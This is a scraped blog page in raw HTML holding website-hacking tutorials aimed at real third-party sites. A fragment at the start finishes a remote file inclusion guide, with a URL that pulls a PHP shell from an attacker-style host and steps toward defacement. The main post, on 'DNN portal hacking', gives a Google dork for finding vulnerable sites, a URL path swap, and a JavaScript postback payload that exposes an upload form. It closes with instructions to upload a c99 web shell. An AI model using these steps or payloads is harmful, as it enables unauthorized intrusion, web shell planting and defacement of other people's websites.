inherit;">www.shittysite.com/index.php?page=www.theevilhackerz.com/shell.txt?</span></div></div></div><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><b>A)</b> Get a free host website (like dajoob or free webs)</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><b>B)</b> Put a PHP shell (c99) in text form on the site</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><b>C)</b> Insert the path to the shell in the vulnerable hosts url, </span>like the example above.<br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><b>D)</b> You can then proceed to deface the site etc.</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> If you have any question or query  ,the feel free to ask..Post a comment here !<br /> <br /> <b><span class="Apple-style-span" style="font-family: inherit;">Thankyou,<br xmlns="http://www.w3.org/1999/xhtml" />Admin,ICA.</span></b></div></div>

Hacking Web Hacking What is Remote File Inclusion (RFI) Web Hacking ?

Hey friends...Now we will know about W ebsite hacking method " Remote File Inclusion (RFI) " . This exploits are very simple and a...

Read more »

Portal Hacking (DNN) - Website Hacking Technique Explained

<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: inherit;">Hello frnds, One more hacking method called "<b>Portal Hacking (DNN)</b>". This method also uses google search to find hackable sites.. Now you can imagine that how much <b>google.com</b> is important for Hackers also...</span><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgurKpOJSfJvdwKKYOB1P8M5ZzPUL1hEB-DXqrNfMpKztNvNPRgy7gCsyOGtyx9qpWBc08-6JZX9I3p9TR_AT0zVUVoR6gYPh5CfBfERR9CEP6x7tDJtnr3L7dBdmLvrPsySakkYAK46Ss/s1600/Portal+Hacking+%2528DNN%2529+-+Website+Hacking+Technique+Explained.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgurKpOJSfJvdwKKYOB1P8M5ZzPUL1hEB-DXqrNfMpKztNvNPRgy7gCsyOGtyx9qpWBc08-6JZX9I3p9TR_AT0zVUVoR6gYPh5CfBfERR9CEP6x7tDJtnr3L7dBdmLvrPsySakkYAK46Ss/s640/Portal+Hacking+%2528DNN%2529+-+Website+Hacking+Technique+Explained.jpg" width="640" /></a></div><div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: url(http://www.blogger.com/post-create.g?blogID=1872143086289485572); background-origin: initial; background-position: 100% 0%; background-repeat: no-repeat no-repeat; margin-bottom: 3px; margin-left: 3px; margin-right: 3px; margin-top: 3px;"><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> Lets start the tutorials...<br /> <br /> <br /> <br /> <b>Step 1 :</b><br /> <br /> <a href="http://www.google.com/">http://www.google.com</a><br /> <br /> <br /> <br /> <b>Step 2:</b>Now enter this dork</span><br /> <br /> <div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">:inurl:/tabid/36/language/en-US/Default.aspx</span></div><span class="Apple-style-span" style="font-family: inherit;"></span><br /> <div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: url(http://www.blogger.com/post-create.g?blogID=1872143086289485572); background-origin: initial; background-position: 100% 0%; background-repeat: no-repeat no-repeat; margin-bottom: 3px; margin-left: 3px; margin-right: 3px; margin-top: 3px;"><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="clear: left; float: left; font-family: inherit; margin-bottom: 1em; margin-right: 1em;"><img height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqyntQ_Z0ToQeG6Nx3YmnX0JRL94Aa9ukzIoHYgDsfLKuYwZlxzpt-G4Y8XV_909HaLpuGtdBD0LkHIjODaL4nC6MeHuO6i4eiVERur4pZCMaI2oHrZ30Ze18omUDx8Wwei2jumFGgGeg/s640/1.png" width="640" /></span></span></div><span class="Apple-style-span" style="font-family: inherit;">this is a dork to find the Portal Vulnerable sites, use it wisely.<br /> <br /> <br /> <br /> <b>Step 3: </b><br /> <br /> you will find many sites, Select the site which you are comfortable with.<br /> <br /> <br /> <br /> <b>Step 4: </b><br /> <br /> For example take this site.<br /> <br /> Example:</span><br /> <br /> <div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx</span></div><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> <b>Step 5: </b>Now replace</span><br /> <br /> <div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">/Home/tabid/36/Language/en-US/Default.aspx</span></div><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> with this</span><br /> <br /> <div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</span></div><span class="Apple-style-span" style="font-family: inherit;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBOA3lJaFo7yFLLWuOvKZ2aDBGTd5ufoYOu5aRC1oRJBo3wrhZcslU5c9-REDoVOsypJexOjskGenI7fEVPzteAK9HKS1Lsxm7O2Z9BaR7UxnbkckYYsiRldkHf7PU5I_9C98VXkNmA_k/s1600/3.PNG" /><br /> <br /> <b>Step 6:</b>You will get a Link Gallary page.So far so good!<br /> <br /> <br /> <br /> <b>Step 7: </b>Dont do anything for now,wait for the next step...<br /> <br /> <b><br xmlns="http://www.w3.org/1999/xhtml" />Step 8:</b>Now replace the URL in the address bar with a Simple Script</span><br /> <br /> <div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">javascript:__doPostBack('ctlURL$cmdUpload','')</span></div><span class="Apple-style-span" style="font-family: inherit;"><b>Step 9:</b>You will Find the Upload Option<br /> <br /> <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO5ftlMmplEmvaNHVBxyOd9wYdl9iQ_f0bWSzhMBuO_vXDWkrAuh1owNdESd-QkABoWrEcRWigqi5nfPDQ4oru0tW9VuEQwzlT3vc6u6Zd6tHGYWwlybmHduys9prbbNNBwko_bnbvsS0/s400/4.PNG" /><br /> <br /> <b>Step 10:</b><br /> <br /> Select Root<br /> <br /> <br /> <br /> <b>Step 11:</b><br /> <br /> Upload your package Your Shell c99,c100 etc etc <span class="Apple-style-span" style="color: red;"><i><br /> <br /> </i></span><b><br xmlns="http://www.w3.org/1999/xhtml" />Hope all of like my articles...  Please comment !</b></span></div></div>

Articles Web Hacking Portal Hacking (DNN) - Website Hacking Technique Explained

Hello frnds, One more hacking method called " Portal Hacking (DNN) ". This method also uses google search to find hackable sites.....

Read more »